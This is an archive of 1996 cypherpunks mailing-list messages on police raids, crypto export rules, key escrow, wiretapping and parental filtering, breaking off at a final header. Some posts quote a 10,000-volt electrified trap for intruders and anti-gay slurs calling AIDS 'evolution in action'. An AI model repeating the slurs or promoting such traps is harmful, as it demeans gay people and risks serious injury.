iQCVAwUBMfBpeCaSlK8942+NAQH3cQQAz3gcbfA+qjNuAA9BteO7lxAEKO8QMV9o
vlunLDuZFQtWSVLvhcRR6GDw4gRfxeIswzVAqMIvcQ1vrwCYkhlctA1Thaoep16a
EX95eQ3Os9W24WIVUSW5e16AWczHEzLBeiVX0TBHN+Pqx8JuN5WHOH6yY/+txNht
C287kJI+4Sw=
=9/er
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Elliot Lee <sopwith@redhat.com>
Date: Sat, 20 Jul 1996 16:11:54 +0800
To: cypherpunks@toad.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <199607200134.UAA01969@manifold.algebra.com>
Message-ID: <Pine.LNX.3.93.960720010753.27788B-100000@redhat.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 19 Jul 1996, Igor Chudov @ home wrote:

> 
> It the voltage is 10000 volts, it is always fatal, right? And if you set
> good enough resistors, then the voltage for the human body itself would
> be much less than 10000V -- most of the voltage will be taken by resistors
> themselves.
> 
> Right?

Wrong. What kills is not voltage but current. That is why you can safely
recieve a static shock (on the order of thousands of volts, but
microamperes) and yet still be killed by ordinary AC power (110 volts
here, a whole lot of amps available :).

- --Elliot

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMfBqGiaSlK8942+NAQGVXAQApub7Av5NJhhaT+GFvPrdWsjKdRKkciCn
waOH51N6J2WvyZHUIrw8amxFBHmjEGIdu9Bx0yngYh7U+ijW4aCP5bOrzf8WYlla
zodx6J+4N6aNYFj1q0gt9QRfrQKN4O3/mp8gx6EsyZJfco7/PR1V7MjWR3qzzOng
qpCqPquGoXo=
=Nujf
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 20 Jul 1996 11:52:29 +0800
To: cypherpunks@toad.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
Message-ID: <ae1571d90f021004c070@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:21 PM 7/19/96, Arun Mehta wrote:
>I must admit all this talk about what kinds of bullet best
>penetrates Kevlar makes me
>shake my head and wonder what's happening to the world --
>particularly since you are
>far more likely to use this weaponry in a rage against a loved one than
>against
>someone breaking down your door. The "good" guys arming

By "you," I have to presume you mean "me." No, I am not at likely to use
this weapon in a rage against a loved one. Trust me.

In any case, by far the most common weapon used for family killings is the
ordinary knife. Easily available, in multiple forms, it kills efficiently
(if not always quickly).


>themselves so that the "bad"
>don't invade reminds me of the stupid arms race between the US
>and the Soviets: I
>wonder how many burglars in Western Europe carry guns -- in the US, you'd
>be real stupid if you didn't carry the latest weaponry.

It may sound "stupid" to you...I suggest you read up on evolutionary game
theory. Sometimes one has no choice but to respond to an arms buildup.
Unilateral disarmament rarely works.

By the way, many burglars consciously and carefully choose to be unarmed,
as confrontation is _not_ what they want, and they know that possession of
a firearm during a robbery significantly worsens their situation if they
are apprehended.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Llywarch Hen <ecgwulf@worldnet.att.net>
Date: Sat, 20 Jul 1996 19:16:37 +0800
To: cypherpunks@toad.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
Message-ID: <2.2.16.19960720081320.2427098c@postoffice.worldnet.att.net>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
>If a black-clad ninja enters my house without warning, I'll have to react
>the only way I know how, by reaching for my gun. I don't have the luxury of
>freezing, exposing my neck (wolf-style), and hoping that the ninjas are
>"just" the police.

Sir, you are not allowing for just how incredibly stupid the cops are. When
they show up at your house, it is all over. They've already decided that you
are scum. You'd have us believe that you lie awake stroking your gun. You
have not had the opportunity to look closely at the business end of a gun.
The hole looks enormous. Come off it grandpa. This is not a fashion show --
'black-clad' indeed. The one 'black-clad' character that comes to mind is
the _Economist_ editor found dead last year on his kitchen table wearing a
tight-fitting latex number who expired having sex with him/itself. Of course
this says nothing about the _Economist's_ readership, except most likely in
your case.

Forget the crocodile pits and the other juvenile stunts. If you have the
slightest bit of incriminating material (queer porn?) on your hard drive,
you'll roll over in no time and give your pals to the cops. These assholes
would rather shoot you than admit to a mistake. One bullet from one of them,
and they'll all execute you on the spot to cover for the idiot. 
-- Llywarch Hen





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Sat, 20 Jul 1996 21:11:58 +0800
To: David Sternlight <cypherpunks@toad.com
Subject: Re: Borders *are* transparent
Message-ID: <1.5.4.32.19960719191346.003005d8@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 02:08 19/07/96 -0700, David Sternlight wrote:
>At 11:24 AM -0700 7/18/96, Timothy C. May wrote:
>
>>This is a terribly important point: if a citizen of Foobaria succeeds in
>>connecting to the Netscape site--perhaps by experimenting with various
>>combinations of domain names and submitted address/zipcode
>>combinations--and Netscape sends him the file, he has not committed a crime
>>in his own country. (Unless they have their own laws....)
...
> It won't be readily available though, except for
>those who have no compunctions about software piracy.

Is enought information available for someone else to write
software that would be able to 
communicate with Netscape's at the US-level of crypto? If so, the
US government is simply
forcing Netscape to open a window of opportunity for some foreign
software company to come up with a competing product for the
international market. A case of cutting off your nose to spite your face?
Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://www.cerfnet.com/~amehta/  finger amehta@cerfnet.com for public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 20 Jul 1996 13:00:07 +0800
To: cypherpunks@toad.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
Message-ID: <ae1574dc100210047571@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:42 AM 7/19/96, snow wrote:
>On Thu, 18 Jul 1996, Doug Hughes wrote:
>
>> If people break into my house with the element of surprise wearing
>> all black in the middle of the night, they have the element of surprise
>> FIRMLY on their side.. I'd have to believe that reaching for a gun
>> was the most stupid thing I could do in the entire world in this sort
>> of circumstance.
>> "You'd be right, but you'd be dead" - Dr. SNMP
>>  If you don't reach for a gun, at least you have the 'chance' for
>> restitution on your side. If you're dead, you have no options.
>
>     If you are trained a certain way, you _are_ going to reach for
>a weapon, and hell, at least then my kid will have enough money to go to
>whatever college she wants.

Snow is absolutely right! Surprised in the night, with no clear
identification of the entrants (and yelled "Police!!" claims are used by
home invaders, so I would not trust this anyway), a trained person will
instinctively reach for his weapon.

I again ask what was so wrong with the "You are surrounded. Come out with
your hands up." routine of years past. Instead of anonymous ninjas in
paramilitary black raiding a house and shooting anything that moves, use
some "due process."

And "due process" is what it's about. Presentation of a warrant, or at
least pretty careful announcement of identity. Blasting down doors without
presentation of an arrest or search warrant is just not the American way.

Are there circumstances that can ever justify no-warning attacks? I suppose
so, such as when clear evidence of, say, a bomb-making or terrorist cell is
invovled. Neither condition was met at at either Ruby Ridge or Waco, nor in
the vast number of midnight drug raids.

If a black-clad ninja enters my house without warning, I'll have to react
the only way I know how, by reaching for my gun. I don't have the luxury of
freezing, exposing my neck (wolf-style), and hoping that the ninjas are
"just" the police.

And very interestingly, many cops are saying the same thing. They realize
that the dangers of being killed in a firefight in the confusion of a
pre-dawn raid are not worth the meager gains. And SWAT-raiding the wrong
house has resulted in many a million-dollar judgements agasint police
departments.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Date: Sat, 20 Jul 1996 21:31:07 +0800
To: Jerome Tan <jti@i-manila.com.ph>
Subject: Re: Firewall Penetration
Message-ID: <2.2.32.19960720085907.006b1ba4@gonzo.wolfenet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:29 PM 7/19/96 +0800, you wrote:
>Is it possible to penetrate a firewall?

yes.    

//cerridwyn//





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 20 Jul 1996 12:56:44 +0800
To: cypherpunks@toad.com
Subject: Ignorance is Strength, Escrow is Security
Message-ID: <ae157ddd11021004931d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:01 PM 7/19/96, Steve Reid wrote:

>I'm sure the evil Iraqi terrorists (and other horsemen) are snooping the
>line, using their newly purchased PCs and FPGAs to crack the 40-bit crypto
>so that they can gain the wonderful advantages of 128-bit SSL, which will
>of course prevent wiretaps from working, thus aiding them in their
>terrorist attacks and bringing about the end of the world as we know it.

The Iraqi People's Benovolent Security Protection Brigade (IPBSPB) has no
need to snoop the lines, at least for my communications, as I am
voluntarily escrowing my communications keys as well as my storage key with
the IPBSPB.

To the United States government requesting a global key escrow regimen, be
careful what you ask for, as you may get it.

(Question: I know that the Iraqi IPBSPB has close relations with the French
SDECE, so does this mean I can just escrow my keys with the Iraqis and
assume they have let the boys at SDECE get copies?)

"America will be stronger when 137 nations of the world and their
notoriously corrupt security services have access to all communications of
Americans."

Ignorance is Strength, Escrow is Security, Arbeit Macht Frei.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 20 Jul 1996 16:07:57 +0800
To: cypherpunks@toad.com
Subject: High Voltage Management
Message-ID: <ae15a09b13021004bc9d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:34 AM 7/20/96, Igor Chudov @ home wrote:
>jim bell wrote:
...
>> I've had a substantially better idea.  Hang carbon-fiber bundles from the
>> ceiling, which are charged to about 10,000 volts when an intrusion is
>> detected.  They'll glom onto anything conductive within their range, and
>> anyone with the bad fortune to be breaking into the house at that moment
>> _might_ live to regret it.  (resistors could be added to limit the current
>> to non-fatal but exceedingly painful levels.
>
>It the voltage is 10000 volts, it is always fatal, right? And if you set
>good enough resistors, then the voltage for the human body itself would
>be much less than 10000V -- most of the voltage will be taken by resistors
>themselves.
>
>Right?

Right! 10,000 volts is always fatal.

In fact, I died many times during my high school days, playing with 20,000
volt neon sign transformers, 100,000 volt Tesla coils, and (gasp) 250,000
volt Van de Graaf generators. (By the way, the neon sign transformer was
actually pretty dangerous, and my handling of it was careless, I now see.
Be careful when you convert one of these into a Jacob's Ladder, or use it
for plasma studies.)

However, maybe the a.c. nature of some of these voltage sources revived me
on the "reverse" cycle. (The V.D.G. is not a.c....so this blows this
theory.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sat, 20 Jul 1996 22:32:08 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Borders *are* transparent
In-Reply-To: <ae13cb6c140210047abf@[205.199.118.202]>
Message-ID: <31F0C881.5902@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> Likewise, much "export-controlled" software is freely purchasable without
> any form of identification or proof of citizenship/residency in any of
> thousands of U.S. software stores. (I don't know if the copies of Netscape
> Navigator on the shelves in U.S. stores are now the "U.S." version, as
> opposed to be a somwhat-crippled version, but I sure do know that a *lot*
> of nominally-export-controlled software _is_ freely purchasable.)

  The retail version of Netscape Navigator sold in US stores
has been the US version for almost a year now.  The first run
were the export version, because the marketing people thought
it would be easier.  When I explained the issue, they made the
change to the stronger US version immediately.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 20 Jul 1996 14:45:36 +0800
To: cypherpunks@toad.com
Subject: Don't "Rush" to Judgment
Message-ID: <ae15a8b914021004a500@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:51 PM 7/19/96, Hallam-Baker wrote:

>The people of the USA fortunately disagree. Its no coincidence that Limbaugh
>has been unable to continue his tv show after his coverage of the OKC bombing.


Gee, Phill, you might want to hire a new fact-checker,

>From the latest issue I have of the Usenet Limbaugh Newsletter:

"LIMBAUGH WATCH

"July 16, 1996 - It's now 1336 days after Bill Clinton's election,
but Rush is still on the air with 650 radio affiliates (with more
than 20 million listeners weekly world-wide), 234 TV affiliates,
and a newsletter with more than 500,000 subscribers."


If you simply make up your facts, say so.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sat, 20 Jul 1996 22:57:25 +0800
To: Remo Pini <rp@rpini.com>
Subject: Re: Netscape download requirements
In-Reply-To: <1.5.4.32.19960719222040.008f8914@193.246.3.200>
Message-ID: <31F0CC92.44D7@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Remo Pini wrote:
> 
> Why can't anybody in US write a little program that compares the two 4.5 meg
> install files and make a patcher? (It seems simple to do, is very
> inconspicuous and of course does not violate the ITAR - although it might
> violate some copyright stuff, but hey, whos willing to enforce something
> like that, when it's anonymously posted or mailed)

  Actually a lawyer once told me that such a patch might be considered
a "defense repair", and thus be regulated by the ITAR.  I kid you not.
Your bits would fall into the same bucket as missile parts.  The more
I learn about ITAR and the way the government tries to link software
to it, the more amazed I get.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 20 Jul 1996 16:06:11 +0800
To: cypherpunks@toad.com
Subject: Government = Obscenity?
Message-ID: <ae15ab6b15021004470c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:00 PM 7/19/96, Declan McCullagh wrote:
>This move by Singapore to censor a newsgroup posting is a good example of
>the overbreadth of government censorship. It's a bait-and-switch maneuver:
>say you're going after porn but censor "offensive" speech.

I'm surprised Duncan has not come forth with one of his patented "My Dad
says..." comments, so I will emulate his style.

Imagine a child refusing in school to do an assignment that involves
connecting to various government Web sites...

"My Dad says government is obscene, and that I'm not old enough yet to look
at obscenity."

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sat, 20 Jul 1996 23:05:23 +0800
To: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Subject: Re: Borders *are* transparent
In-Reply-To: <1.5.4.32.19960719191346.003005d8@giasdl01.vsnl.net.in>
Message-ID: <31F0D2BE.55B6@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Arun Mehta wrote:
> Is enought information available for someone else to write
> software that would be able to
> communicate with Netscape's at the US-level of crypto? If so, the
> US government is simply
> forcing Netscape to open a window of opportunity for some foreign
> software company to come up with a competing product for the
> international market. A case of cutting off your nose to spite your face?

  It has already been done several times over.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 20 Jul 1996 17:59:33 +0800
To: cypherpunks@toad.com
Subject: Re: American People the relation to the Police
Message-ID: <ae15b2de160210040724@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:38 AM 7/20/96, Jim Choate wrote:

>I disagree. This country fought two wars of liberation (you forgot about
>1812) and a civil war to discredit this thesis in relation to a Democracy
>founded upon individual liberty. It is no coincidence that the Tree of Liberty

Well, to many of us, the wrong side won the War of the Rebellion (aka the
Civil War, aka the War Between the States, etc.).  A bunch of southern
states wanted to seceed, which my reading of the founding documents said
was clearly an option if sentiment was strong enough in that direction.

Constitutional scholars of course debate this, and I've seen arguments that
the documents eventually agreed to in 1789-90 in some ways undercut this
"right" to seceed. I think this to be untrue, and that the signers of the
Declaration and of the Constitution would be surprised to learn that they
were signing a one-way, unreversible, no way out document, binding their
communities to be part of the United States of America forever, even if
their populace clearly wants out.

So, the wrong side won.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 20 Jul 1996 18:40:44 +0800
To: cypherpunks@toad.com
Subject: Re: Kellstrom Calls for DT Funding
Message-ID: <ae15bb1717021004f5c9@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


[File under the "be careful what you ask for" heading]

At 12:58 AM 7/20/96, jim bell wrote:
>At 02:33 PM 7/19/96 -0400, Duncan Frissell wrote:
>>In a "briefing" on TWA 800 when one of the reporters tossed Big Jim
>>Kellstrom (Deputy Director in Charge of the New York Office) of the FBI a
>>softball question about what he needed to fight terrorism; he took the
>>opportunity to call for full funding of the Digital Telephony Bill.  He said
>>the usual about how bad guys conspire and we need to tap.
>
>
>Too bad these people aren't required to show specific examples where the
>"bad guys" got away as a result of their failure to be able to do wiretaps.

I don't think asking for this evidence is a good idea. After all, there
probably _are_ such examples. It stands to reason.

But so what? The issue is not whether extensive wiretapping would catch
certain conspirators and head off certain crimes, the issue is one of how
liberal and free societies are to operate. Our system has frowned upon such
Orwellian schemes as mandating that video cameras be placed in all
residences and in all hotel rooms, regardless of whether certain crimes
would be detected or deterred.

The proper argument is not to demand proof of how useful such measures as
the FBI would like to see are, but, rather, to focus on basic rights
issues.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 20 Jul 1996 21:37:59 +0800
To: tcmay@got.net
Subject: Re: Filtering out Queers is OK
Message-ID: <01I7ABUH1S8C9EDBN7@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"tcmay@got.net" 19-JUL-1996 04:37:28.75

>If I had kids, I'd make sure that lots of negative memes were kept away
>from them until they reached an age where it no longer mattered, where
>there views are already basically set.

>I see nothing wrong in this. Anyone who disagrees is, of course, free to
>set his filters differently, but not to insist that my filters be changed.
>And the government is not free to pass any laws about what filter sites can
>and can't do.

>Unfortunately, I think many on this list are so taken by "liberalistic"
>notions that they think the State needs to intervene to stop me from
>filtering my son's access to "The Joys of Queer Sex."

	State? I'd call it right for private individuals as well. Ultimately,
it's the job of the state, if it has one, to protect the rights of
individuals... including minors. Private individuals can protect those rights
as well, just as we can stop someone from getting mugged by shooting the
mugger.

>(As a libertarian, I really don't care what sexual practices others
>practice, so long as I am not forced to either fund or witness their
>practices. And so long as I am free to filter out their practices as I see
>fit, including for my minor children and/or members of my household.)

	Well, as a libertarian the only excuse I can see for parental rights
is parental responsibilities. If something is needed in order to carry out
those responsibilities, then the parent has the right to make those decisions
(unless it's shown that the parent isn't competent to). But I need to see
something before I can say that the parent has that right. It's the same thing
that I need to see before I can say that I'm harming some
environmentalist by driving my car (global warming or whatever nonsense). It's
called proof.

>Some parents simply get tired of spending time each night trying to undo
>the propaganda taught in many public school, such as books like "I Have Two
>Mommies." Many of these parents eventually give up and put their kids in
>religious or private schools (even though they continue to pay taxes for
>schools their own children are no longer using).

	Actually, I perfectly well agree with you that schools (especially
the public variety) shouldn't be promoting PC values. (We've got a college at
Rutgers, Livingston, with the avowed purpose of promoting "diversity."
Unsurprisingly, even the administration is beginning to admit it has a
reputation for being, shall we say, scholastically unachieving?) Neither
should they be promoting any other set of values, other than that of "learn."
Parents smart enough to send their kids to such a school will see them
succeed, in a properly meritocratic society; ones sending their kids to schools
where ideology is more important than giving the kids the information they
need to make up their own minds won't see them succeed, overall.

>Queers are, as far as I'm concerned, perfectly free to practice their
>AIDS-spreading practices to any and all receptive anuses they can find, but
>I eschew this lifestyle and will fight to the death for this right to avoid
>their practices from being forced on me or my children (if I had any, which
>I don't).

	Fascinating. So you and I are both opinating from the same amount of
direct knowledge of parenting... and I'm going with better and clearer
memories of being a child and teenager.

>I think of AIDS as "evolution in action." Retroviruses which  have existed
>for millenia now find new vectors for spreading in our population. I cry no
>tears for those dying of AIDS, and work to reduce to tax dollars spent on
>such things as "AIDS research." Let those who introduced the new vector pay
>for the research.

>What do you call ten million AIDS deaths?  You figure it out.

	Well, let's see, it's currently spreading via heterosexual transmission
since the "queers" are the ones who've been smart enough to start using
condoms. (Check out Southeast Asia, for instance. I've looked at studies
(such as from ChristNet) trying to show otherwise; they had so many scientific
flaws that I stopped reading.) Think of it as evolution in action.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Sun, 21 Jul 1996 00:45:49 +0800
To: cypherpunks@toad.com
Subject: Re: Filtering out Queers is OK
In-Reply-To: <v03007605ae158803ab26@[192.187.162.15]>
Message-ID: <v03007603ae16956a64e2@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:57 PM -0700 7/19/96, Mike Duvos wrote:
>David Sternlight <david@sternlight.com> writes:
>
> > This is simply incorrect. It is a supportable advocacy for
> > most adults, but children's minds tend to be like
> > sponges--everything they take in (up until a certain age) is
> > thought to be true, interesting, worth experimenting with,
> > based on authority, etc. Read Piaget.
>
>Piaget was very good at "proving" how fundamentally different the
>minds of children were from those of adults, and at constructing
>elaborate webs of complex terminology and doctrine to support his
>notions.

There are many others who have come to similar conclusions about the
formation of independent judgement in children, and lots of non-Piaget
experiments. Your comments are diversionary and in fact by the end of your
post you come to agree with my basic point.

>
>Again, we are applying a standard to the Net which has never been
>applied to libraries.  Any orthodox Jewish child can read all he
>or she wants in a library about the wonders of pig-eating,
>without any possibility of parental supervision or disclosure of
>their un-Jewish interests.

That is also false in its implications. Librarians are in loco parentis,
and most libraries are VERY careful about what materials young children are
exposed to and what is more, are responsive to community pressure in the
matter since most libraries are community-based. Again you have seized on
the details of an example to act as if it were the argument itself, and
nit-picked. My core point remains unrefuted.

>
>Generally, very young children do not have the neural wiring in
>place to suspend emotional reactions to imagery based on
>intellectual considerations. Seeing an picture of someone being
>hurt in a movie causes them the same emotional pain as seeing
>someone hurt in real life, even though they may know perfectly
>well that the former image is fictional in nature.
>
>Almost all children develop this important critical faculty by
>the age of 12, by which point, they manage to only be sickened by
>the evening news, and not by the latest "Nightmare on Elm Street"
>sequel.

So after trying to refute my point, you come to agree with it and want to
shift the issue to the question of at what age.... I'm not competent to
assess that nor, I assert, are you; I suggest it varies with the child and
it's up to the individual parent to make those subtle distinctions, issue
by issue, child by child.

>
>While limiting the "horizons" of persons in their middle to late
>teens is often justified by arguments about developmental stages,
>the truth is that it is simply an attempt by their keepers to
>control how they think and to what views, mostly political and
>social in nature, they are exposed to.

Now you've really got me on the ropes to understand you. As I parse the
above sentence it says limiting is often justified but it might not be.
What kind of definitive conclusion is that? I suggest none, and your bottom
line is that it's case by case. If so, it's up to the parents to figure out
where THEIR kid is on the scale--nobody else has as much time, motivation,
or opportunity to observe.

David.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sun, 21 Jul 1996 01:32:17 +0800
To: David Sternlight <david@sternlight.com>
Subject: Re: Netscape download requirements
In-Reply-To: <v03007600ae161ad816f6@[192.187.162.15]>
Message-ID: <Pine.SUN.3.91.960720080055.5483B-100000@crl12.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Fri, 19 Jul 1996, David Sternlight wrote:

> I've been around for so long that I knew when I typed the above
> someone would try to take my words literally in order to avoid
> my point and pick the above nit.

I don't think the 9th and 10th Amendments are nits.

> If they disagree with what Congress and the administration have
> done, there are well-established ways to petition Congress to
> change it. 

Read the 9th, David.  Our rights exist whether or not the current
regime recognizes them.  The reason Congress gets away with so
many violation is in part due to the current population being
willing to exchange a false sense of security for out and out
violations of the clear words of the Bill of Rights.  That may 
be democracy, but at the expense of Constitutionally guaranteed
freedoms.  Read the 9th and 10th, David.

> If they fail, t.s.--that's the way our system works.

Or doesn't work.

> YOU don't get to force your will on the wider population,

No, you merely get to stop others from forcing their will on you.

> nor do YOU get to tell them that they are poor benighted fools
> who should agree with YOUR views on civil liberties. To assert
> otherwise is fascism, authoritarianism, dictatorship, pick one.

No, David, it's free speech.  Read the 1st Amendmend, David. 


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@alpha.jpunix.com>
Date: Sat, 20 Jul 1996 23:42:08 +0800
To: Mixmaster Mailing List <alt.privacy.anon-server@myriad.alias.net
Subject: New type2.list/pubring.mix
Message-ID: <Pine.NEB.3.93.960720081332.13579B-100000@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Everyone!

	There is a new type2.list/pubring.mix combination on jpunix.com.
The new list reflects the re-birth of rebma. Welcome back! The combo is
available through the Web at www.jpunix.com as well as anonymous FTP at
ftp.jpunix.com.

Note: The PGP public keyserver at jpunix.com is temporarily down. I think
I'm suffering from a corrupted keyring. I'm working on getting it back up.
Please be patient.

 John Perry - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMfDcjVOTpEThrthvAQHfUgP/e0qcOi/3i99on9O3CrZB5n0dDEGZP83M
mFspHOHGzmyoTEf71HmUzi5/1vTaNfykSj0JGM62PdVOM4hCchQsUH9IGodE0aWx
L3FcIu5SQNzBZt66f2MU0QJ4uchn4lRcgtVypVJdxZZLaNDAQFwsxK2FDURuDnBm
qw91fU5G3Yc=
=LAmO
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Sat, 20 Jul 1996 23:03:31 +0800
